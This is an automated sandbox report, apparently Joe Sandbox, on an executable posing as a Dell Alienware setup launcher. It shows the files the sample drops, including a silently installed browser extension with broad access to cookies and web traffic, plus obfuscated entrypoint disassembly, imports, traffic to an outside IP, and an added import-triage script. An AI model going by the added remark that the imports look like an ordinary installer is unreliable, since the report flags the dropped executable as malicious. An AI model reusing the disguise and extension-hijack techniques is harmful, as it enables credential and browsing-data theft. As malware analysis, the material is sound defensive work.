Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:dropped
Size (bytes):1981
Entropy (8bit):5.365969892012237
Encrypted:false
SSDEEP:48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
MD5:B5CEED4A6FA3F501787DE10B4CB02EEE
SHA1:F09C0A8CA18D825D6CE6F192090EBD0659C7321B
SHA-256:749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
SHA-512:02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
Malicious:false
Preview: {"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false
C:\Users\user\AppData\Localwebdata1612045902958
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
C:\Users\user\AppData\Roaming\1612045890161.exe
Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):103632
Entropy (8bit):6.404475911013687
Encrypted:false
SSDEEP:1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
MD5:EF6F72358CB02551CAEBE720FBC55F95
SHA1:B5EE276E8D479C270ECEB497606BD44EE09FF4B8
SHA-256:6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
SHA-512:EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
Malicious:true
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 14%
C:\Users\user\AppData\Roaming\1612045890161.txt
Process:C:\Users\user\AppData\Roaming\1612045890161.exe
File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:dropped
Size (bytes):27328
Entropy (8bit):3.7078509698470126
Encrypted:false
SSDEEP:192:b3w/3wBkf3DpvI6PprepmlmE1lVT0oMoSDNlkSP:bqg+flvIKpt3VvODNlkSP
MD5:C82FB62C10E490945B2CB638D72998D2
SHA1:1F746A26B442E8D69457445D78F0E2F52BAE9D66
SHA-256:6CC5B1B6DB576F487EC2B21D258BEDFAA1E233DBA53A663C1019AF8ECC7F8D53
SHA-512:A13B2F8C7796AE7276B52993ECC1627B58082321699D5C5C72D7BFC042F6B24283A26F227DFF0B8249769C5B2E96137A10391752BD28EE21672F44ADAB5429D3
Malicious:false

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.745694560857276
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:fnhcdXEfus.exe
File size:4453376
MD5:18169f98e39ae228d131aec477c8a2e9
SHA1:c6c6eacaa8df6ea5251c7f26a2d9ec4317092e6a
SHA256:344b323928698d9982c7577e5405a1cb587c45f94a0f6745827648381397f255
SHA512:8deaca50e918252ba85715c85096e810733a9512c656fa40ad71e22437cc8f74d1965468592929a4b1216d33da598c308b312f5c1aa770f62959c873a4582efb
SSDEEP:98304:bCgleegKSmFIJuPzyoCe1NGDyqMcKzH4znz8xViN:bBbviJu7JC0UDLwzanz8xQ

File Icon

Icon Hash:497971328ce1634d

Static PE Info

General

Entrypoint:0x44523a
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x5BA39B6E [Thu Sep 20 13:06:54 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:d91a0a44f8762e656db1be8576dd54b2

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub ebp, 18h
mov dword ptr [ebp-14h], 0044523Ah
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F8DB4EE0FA2h
inc esi
mov ecx, dword ptr [esp]
add eax, edx
mov ecx, dword ptr [esp]
mov ecx, dword ptr [ecx]
call ebp
mov edx, esi
pop edx
popad
push 00000003h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F8DB4EE0F9Dh
mov edx, ebx
mov edi, ebp
mov eax, dword ptr [eax]
mov eax, dword ptr [esp]
mov eax, ecx
popad
mov eax, 004455BCh
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F8DB4EE0FA4h
mov edx, dword ptr [ecx]
push ebx
mov eax, dword ptr [esp]
dec ebx
mov esi, edi
pushad
mov ebx, ecx
inc dword ptr [ecx]
idiv eax
mov edx, ecx
popad
push eax
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 04h
                                                                                                                                                                        jne 00007F8DB4EE0F9Fh
                                                                                                                                                                        pop edi
                                                                                                                                                                        inc ecx
                                                                                                                                                                        mov ebp, ecx
                                                                                                                                                                        mov ecx, esp
                                                                                                                                                                        cmp eax, edx
                                                                                                                                                                        imul eax, edx
                                                                                                                                                                        mov esp, esi
                                                                                                                                                                        popad
                                                                                                                                                                        push 000013C5h
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 04h
                                                                                                                                                                        jne 00007F8DB4EE0F9Fh
                                                                                                                                                                        dec edx
                                                                                                                                                                        mov ecx, edi
                                                                                                                                                                        popad
                                                                                                                                                                        mov esi, ebx
                                                                                                                                                                        push eax
                                                                                                                                                                        call esp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        idiv eax
                                                                                                                                                                        popad
                                                                                                                                                                        push 00445DF0h
                                                                                                                                                                        pushad
                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                                                                        pop ebx
                                                                                                                                                                        cmp ebx, 00000000h

Rich Headers

Programming Language:
• [RES] VS2012 UPD1 build 51106
• [C++] VS2012 UPD1 build 51106
• [ C ] VS2012 UPD1 build 51106
• [LNK] VS2012 UPD1 build 51106

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9abd0 | 0xdc | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa8000 | 0x498ec | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf2000 | 0x8454 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x768a0 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x87710 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x76000 | 0x4f4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x9a5b4 | 0xe0 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x74497 | 0x74600 | False | 0.513208243824 | data | 6.58470653969 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x76000 | 0x2662a | 0x26800 | False | 0.360135957792 | data | 4.65071874944 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9d000 | 0xa970 | 0x2400 | False | 0.295789930556 | data | 4.48877485279 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0xa8000 | 0x498ec | 0x49a00 | False | 0.341989203098 | data | 6.45902686047 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf2000 | 0x1f3b6 | 0x1f400 | False | 0.0011484375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
GIF | 0xa8db4 | 0x339f | GIF image data, version 89a, 350 x 624 | English | United States
PNG | 0xac154 | 0x39ed | PNG image data, 360 x 150, 8-bit/color RGBA, non-interlaced | |
PNG | 0xafb44 | 0x2fc9 | PNG image data, 240 x 227, 8-bit/color RGBA, non-interlaced | |
RT_BITMAP | 0xb2b10 | 0x14220 | data | |
RT_BITMAP | 0xc6d30 | 0x1b5c | data | |
RT_BITMAP | 0xc888c | 0x38e4 | data | |
RT_BITMAP | 0xcc170 | 0x1238 | data | |
RT_BITMAP | 0xcd3a8 | 0x6588 | data | |
RT_BITMAP | 0xd3930 | 0x11f88 | data | |
RT_ICON | 0xe58b8 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0xe5d20 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4289178028, next used block 4289178028 | |
RT_ICON | 0xe6dc8 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4289178028, next used block 4289178028 | |
RT_ICON | 0xe9370 | 0x2e8 | data | |
RT_ICON | 0xe9658 | 0x2e8 | data | |
RT_DIALOG | 0xe9940 | 0x1ce | data | |
RT_DIALOG | 0xe9b10 | 0x266 | data | |
RT_DIALOG | 0xe9d78 | 0x2b0 | data | |
RT_DIALOG | 0xea028 | 0x54 | data | |
RT_DIALOG | 0xea07c | 0x34 | data | |
RT_DIALOG | 0xea0b0 | 0xd6 | data | |
RT_DIALOG | 0xea188 | 0x114 | data | |
RT_DIALOG | 0xea29c | 0xd6 | data | |
RT_DIALOG | 0xea374 | 0x246 | data | |
RT_DIALOG | 0xea5bc | 0x3c8 | data | |
RT_DIALOG | 0xea984 | 0x14e | data | |
RT_DIALOG | 0xeaad4 | 0x1e8 | data | |
RT_DIALOG | 0xeacbc | 0x1c6 | data | |
RT_DIALOG | 0xeae84 | 0x1ee | data | |
RT_DIALOG | 0xeb074 | 0x7c | data | |
RT_DIALOG | 0xeb0f0 | 0x3bc | data | |
RT_DIALOG | 0xeb4ac | 0x158 | data | |
RT_DIALOG | 0xeb604 | 0x1da | data | |
RT_DIALOG | 0xeb7e0 | 0x10a | data | |
RT_DIALOG | 0xeb8ec | 0xde | data | |
RT_DIALOG | 0xeb9cc | 0x1d4 | data | |
RT_DIALOG | 0xebba0 | 0x1dc | data | |
RT_DIALOG | 0xebd7c | 0x294 | data | |
RT_STRING | 0xec010 | 0x160 | data | English | United States
RT_STRING | 0xec170 | 0x23e | data | English | United States
RT_STRING | 0xec3b0 | 0x378 | data | English | United States
RT_STRING | 0xec728 | 0x252 | data | English | United States
RT_STRING | 0xec97c | 0x1f4 | data | English | United States
RT_STRING | 0xecb70 | 0x66a | data | English | United States
RT_STRING | 0xed1dc | 0x366 | data | English | United States
RT_STRING | 0xed544 | 0x27e | data | English | United States
RT_STRING | 0xed7c4 | 0x518 | data | English | United States
RT_STRING | 0xedcdc | 0x882 | data | English | United States
RT_STRING | 0xee560 | 0x23e | data | English | United States
RT_STRING | 0xee7a0 | 0x3ba | data | English | United States
RT_STRING | 0xeeb5c | 0x12c | data | English | United States
RT_STRING | 0xeec88 | 0x4a | data | English | United States
RT_STRING | 0xeecd4 | 0xda | data | English | United States
RT_STRING | 0xeedb0 | 0x110 | data | English | United States
RT_STRING | 0xeeec0 | 0x20a | data | English | United States
RT_STRING | 0xef0cc | 0xba | data | English | United States
RT_STRING | 0xef188 | 0xa8 | data | English | United States
RT_STRING | 0xef230 | 0x12a | data | English | United States
RT_STRING | 0xef35c | 0x422 | data | English | United States
RT_STRING | 0xef780 | 0x5c2 | data | English | United States
RT_STRING | 0xefd44 | 0x40 | data | English | United States
RT_STRING | 0xefd84 | 0xcaa | data | English | United States
RT_STRING | 0xf0a30 | 0x284 | data | English | United States
RT_GROUP_ICON | 0xf0cb4 | 0x30 | data | |
RT_GROUP_ICON | 0xf0ce4 | 0x14 | data | |
RT_GROUP_ICON | 0xf0cf8 | 0x14 | data | |
RT_VERSION | 0xf0d0c | 0x428 | data | |
RT_MANIFEST | 0xf1134 | 0x535 | XML 1.0 document, ASCII text, with CRLF line terminators | |
RT_MANIFEST | 0xf166c | 0x280 | XML 1.0 document text | English | United States

Imports

DLL | Import
COMCTL32.dll |
KERNEL32.dll | LoadLibraryW, lstrcmpW, lstrcmpiW, GetSystemDefaultLangID, GetUserDefaultLangID, VerLanguageNameW, CompareFileTime, CreateDirectoryW, FindClose, FindFirstFileW, FindNextFileW, SetFileAttributesW, GetSystemTimeAsFileTime, GetPrivateProfileStringW, MoveFileW, LocalFree, FormatMessageW, GetSystemInfo, MulDiv, RaiseException, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LoadLibraryExW, GetVersion, GetLocalTime, IsValidLocale, GetCommandLineW, GetFileAttributesW, GlobalAlloc, GlobalFree, FlushFileBuffers, VirtualQuery, IsBadReadPtr, GetDiskFreeSpaceExW, GetDriveTypeW, GetExitCodeProcess, GetCurrentThread, GetLocaleInfoW, InterlockedExchange, LoadLibraryExA, GetModuleHandleW, GetProcAddress, GetSystemDirectoryA, LoadLibraryA, GetLastError, SetLastError, CreateFileW, GetFileSize, CloseHandle, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, lstrlenA, MultiByteToWideChar, WideCharToMultiByte, ReadFile, SetFilePointer, WriteFile, HeapAlloc, lstrcmpA, SystemTimeToFileTime, ResetEvent, SetEvent, FindResourceExW, OpenProcess, GetProcessTimes, ReadConsoleW, WriteConsoleW, SetStdHandle, GetCurrentDirectoryW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, GetTimeFormatW, GetDateFormatW, OutputDebugStringW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetFileType, HeapReAlloc, GetStartupInfoW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FreeLibrary, CompareStringA, CompareStringW, lstrcatW, GetVersionExW, InterlockedDecrement, InterlockedIncrement, CreateEventW, QueryPerformanceFrequency, GetTempFileNameW, CopyFileW, GetTickCount, GetExitCodeThread, CreateThread, FindResourceW, GlobalUnlock, GlobalLock, SizeofResource, LockResource, LoadResource, lstrcpyW, SetErrorMode, GetTempPathW, ExpandEnvironmentStringsW, MoveFileExW, WriteProcessMemory, VirtualProtectEx, GetWindowsDirectoryW, GetSystemDirectoryW, FlushInstructionCache, SetThreadContext, GetThreadContext, CreateProcessW, ResumeThread, TerminateProcess, ExitProcess, GetCurrentProcess, Sleep, WaitForSingleObject, DuplicateHandle, RemoveDirectoryW, DeleteFileW, SetCurrentDirectoryW, lstrlenW, lstrcpynW, GetModuleFileNameW, GetProcessHeap, HeapFree, GetStringTypeW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, GetCurrentThreadId, HeapSize, GetModuleHandleExW, GetStdHandle, GetFullPathNameW, IsProcessorFeaturePresent, IsDebuggerPresent, RtlUnwind, LCMapStringW, DecodePointer, EncodePointer
USER32.dll | DefWindowProcW, PostMessageW, DispatchMessageW, TranslateMessage, GetMessageW, RegisterClassW, PostQuitMessage, CharPrevW, SendDlgItemMessageW, wvsprintfW, LoadImageW, CreateDialogParamW, MoveWindow, SetCursor, GetWindow, GetDlgItemTextW, SetFocus, EnableWindow, SetForegroundWindow, SetActiveWindow, SetDlgItemTextW, IsDialogMessageW, FindWindowW, SubtractRect, IntersectRect, SetRect, FillRect, GetSysColorBrush, GetSysColor, GetWindowRect, GetDC, GetSystemMetrics, GetDlgCtrlID, CreateDialogIndirectParamW, DestroyWindow, IsWindow, SendMessageW, MessageBoxW, CharNextW, WaitForInputIdle, SetWindowLongW, GetWindowLongW, GetClientRect, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, SetWindowPos, SetWindowTextW, GetDlgItem, ExitWindowsEx, CharUpperW, EndDialog, DialogBoxIndirectParamW, ShowWindow, GetDesktopWindow, MsgWaitForMultipleObjects, PeekMessageW, wsprintfW, LoadIconW, LoadCursorW, KillTimer, SetTimer, CreateWindowExW
GDI32.dll | TranslateCharsetInfo, UnrealizeObject, CreateHalftonePalette, GetDIBColorTable, SelectPalette, RealizePalette, GetSystemPaletteEntries, CreatePalette, CreateFontW, GetObjectW, SetTextColor, SetBkMode, GetDeviceCaps, CreateSolidBrush, CreateFontIndirectW, SetStretchBltMode, StretchBlt, SelectObject, DeleteDC, CreateDIBitmap, CreateCompatibleDC, BitBlt, DeleteObject, GetStockObject
                                                                                                                                                                        ADVAPI32.dllGetTokenInformation, RegOpenKeyExW, RegOpenKeyW, RegOverridePredefKey, LookupPrivilegeValueW, AdjustTokenPrivileges, RegCloseKey, FreeSid, EqualSid, AllocateAndInitializeSid, OpenThreadToken, OpenProcessToken, SetEntriesInAclW, SetSecurityDescriptorOwner, SetSecurityDescriptorGroup, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CreateWellKnownSid, RegQueryInfoKeyW, RegEnumKeyExW, RegDeleteKeyW, RegSetValueExW, RegEnumValueW, RegCreateKeyExW, RegDeleteValueW, RegQueryValueExW
                                                                                                                                                                        SHELL32.dllSHGetMalloc, ShellExecuteExW, SHGetPathFromIDListW, SHGetFolderPathW, SHBrowseForFolderW, ShellExecuteW, CommandLineToArgvW
                                                                                                                                                                        ole32.dllCoCreateInstance, CoCreateGuid, CLSIDFromProgID, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree, CoInitialize, CoInitializeSecurity, CoUninitialize
                                                                                                                                                                        OLEAUT32.dllUnRegisterTypeLib, RegisterTypeLib, SysAllocStringLen, SysFreeString, SysReAllocStringLen, SysStringLen, SysAllocString, SysStringByteLen, SysAllocStringByteLen, VarBstrCat, VarBstrFromDate, VariantClear, VariantChangeType, GetErrorInfo, VarUI4FromStr, SystemTimeToVariantTime, LoadTypeLib
                                                                                                                                                                        SHLWAPI.dllPathFileExistsW
                                                                                                                                                                        RPCRT4.dllRpcStringFreeW, UuidCreate, UuidToStringW
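The import table above is the first static triage artefact an analyst reads. The following is an added example, not part of the Joe Sandbox report, that buckets a PE import table into the API clusters a triage analyst looks for: the process-hollowing primitive set (CreateProcessW, WriteProcessMemory, VirtualProtectEx, Get/SetThreadContext, ResumeThread), token privilege manipulation, registry writes, debugger checks and a reboot call. The cluster names and their membership are this example's own heuristic, and the sample import lines are abridged from the table above. A complete match is a pointer to what to watch at runtime, not a verdict: a setup launcher legitimately creates and resumes a child installer process, and IsDebuggerPresent is also emitted by the MSVC runtime.

```python
# Added example (not part of the Joe Sandbox report): bucket a PE import table into
# the API clusters a triage analyst looks for. Cluster names and membership are this
# example's own heuristic; the import lines below are abridged from the table above.
from typing import Dict, Iterable, List, Tuple

API_CLUSTERS: Dict[str, frozenset] = {
    # Create a (suspended) process, rewrite its memory, repoint its main thread:
    # the process-hollowing primitive set. Setup launchers use the same APIs
    # legitimately to start and supervise a child installer, so a full match is a
    # prompt to look at runtime behaviour, not a verdict.
    "process_hollowing": frozenset({
        "CreateProcessW", "WriteProcessMemory", "VirtualProtectEx",
        "GetThreadContext", "SetThreadContext", "ResumeThread",
    }),
    # IsDebuggerPresent is also emitted by the MSVC runtime, so weight it low.
    "anti_debug": frozenset({
        "IsDebuggerPresent", "CheckRemoteDebuggerPresent", "OutputDebugStringW",
    }),
    "token_privileges": frozenset({
        "OpenProcessToken", "LookupPrivilegeValueW", "AdjustTokenPrivileges",
    }),
    "dynamic_api_resolution": frozenset({"LoadLibraryA", "LoadLibraryW", "GetProcAddress"}),
    "registry_write": frozenset({"RegCreateKeyExW", "RegSetValueExW", "RegDeleteKeyW"}),
    "shutdown_reboot": frozenset({"ExitWindowsEx"}),
}

# Constructed input in "<DLL>: <func>, <func>, ..." form, abridged from the report above.
SAMPLE_IMPORTS = [
    "KERNEL32.dll: LoadLibraryW, GetProcAddress, LoadLibraryA, WriteProcessMemory, "
    "VirtualProtectEx, SetThreadContext, GetThreadContext, CreateProcessW, ResumeThread, "
    "TerminateProcess, IsDebuggerPresent, OutputDebugStringW, CreateFileW, WriteFile",
    "USER32.dll: MessageBoxW, ExitWindowsEx, CreateWindowExW",
    "ADVAPI32.dll: OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, "
    "RegCreateKeyExW, RegSetValueExW, RegDeleteKeyW, RegQueryValueExW",
]


def parse_import_line(line: str) -> Tuple[str, List[str]]:
    """Split 'KERNEL32.dll: A, B' into ('KERNEL32.dll', ['A', 'B'])."""
    dll, _, funcs = line.partition(":")
    return dll.strip(), [f.strip() for f in funcs.split(",") if f.strip()]


def triage_imports(lines: Iterable[str]) -> Dict[str, dict]:
    """For every cluster with at least one hit, return the matched APIs, the DLLs
    they are imported from, and the fraction of the cluster present (1.0 = all)."""
    api_to_dll: Dict[str, str] = {}
    for line in lines:
        dll, funcs = parse_import_line(line)
        for func in funcs:
            api_to_dll[func] = dll
    hits: Dict[str, dict] = {}
    for cluster, apis in API_CLUSTERS.items():
        found = sorted(apis & set(api_to_dll))
        if not found:
            continue
        hits[cluster] = {
            "found": found,
            "dlls": sorted({api_to_dll[f] for f in found}),
            "coverage": len(found) / len(apis),
        }
    return hits


if __name__ == "__main__":
    ranked = sorted(triage_imports(SAMPLE_IMPORTS).items(),
                    key=lambda kv: -kv[1]["coverage"])
    for cluster, info in ranked:
        print(f"{cluster:24s} {info['coverage']:.2f}  {', '.join(info['found'])}")
```

Run against the full KERNEL32/USER32/ADVAPI32 lists above, the process-hollowing and token-privilege clusters come back complete; that is consistent with an InstallShield launcher, so the next step is the runtime behaviour, not the imports.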

Version Infos

Description             Data
LegalCopyright          Copyright (c) 2018 Flexera. All Rights Reserved.
ISInternalVersion       24.0.573
InternalName            Setup
FileVersion             5.2.33.0
CompanyName             Dell Inc
Internal Build Number   185990
ProductName             Alienware Command Center Suite
ProductVersion          5.2.33.0
FileDescription         Setup Launcher Unicode
ISInternalDescription   Setup Launcher Unicode
OriginalFilename        InstallShield Setup.exe
Translation             0x0409 0x04b0

Possible Origin

Language of compilation system   Country where language is spoken
English                          United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Src Port  Dst Port  Source IP     Dest IP
Jan 30, 2021 14:31:11.635849953 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:11.823514938 CET  80        49719     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:11.823671103 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:11.824554920 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:11.824605942 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:12.012116909 CET  80        49719     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:12.012165070 CET  80        49719     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:12.335077047 CET  80        49719     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:12.365892887 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:12.365950108 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:12.553586006 CET  80        49719     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:12.553599119 CET  80        49719     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:13.742291927 CET  80        49719     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:13.787702084 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:13.833859921 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:13.833919048 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:14.022130966 CET  80        49719     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:14.022171021 CET  80        49719     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:17.383786917 CET  80        49719     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:17.428641081 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:19.318113089 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:19.318176031 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:19.505898952 CET  80        49719     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:19.505939007 CET  80        49719     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:22.825290918 CET  80        49719     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:22.913503885 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:25.540046930 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:25.727830887 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:25.727924109 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:25.730926037 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:25.731009007 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:25.920118093 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:25.920156956 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:26.497304916 CET  49723     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:26.686372995 CET  80        49723     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:26.686577082 CET  49723     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:26.687041998 CET  49723     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:26.687155962 CET  49723     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:26.877455950 CET  80        49723     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:26.877482891 CET  80        49723     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:27.603024960 CET  49719     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:30.286595106 CET  80        49722     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:30.414025068 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:32.487735033 CET  80        49723     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:32.726711035 CET  49723     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:33.553212881 CET  49723     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:33.553366899 CET  49723     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:33.742155075 CET  80        49723     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:33.742188931 CET  80        49723     34.94.64.66   192.168.2.3
Jan 30, 2021 14:31:37.934276104 CET  49722     80        192.168.2.3   34.94.64.66
Jan 30, 2021 14:31:37.934351921 CET  49722     80        192.168.2.3   34.94.64.66
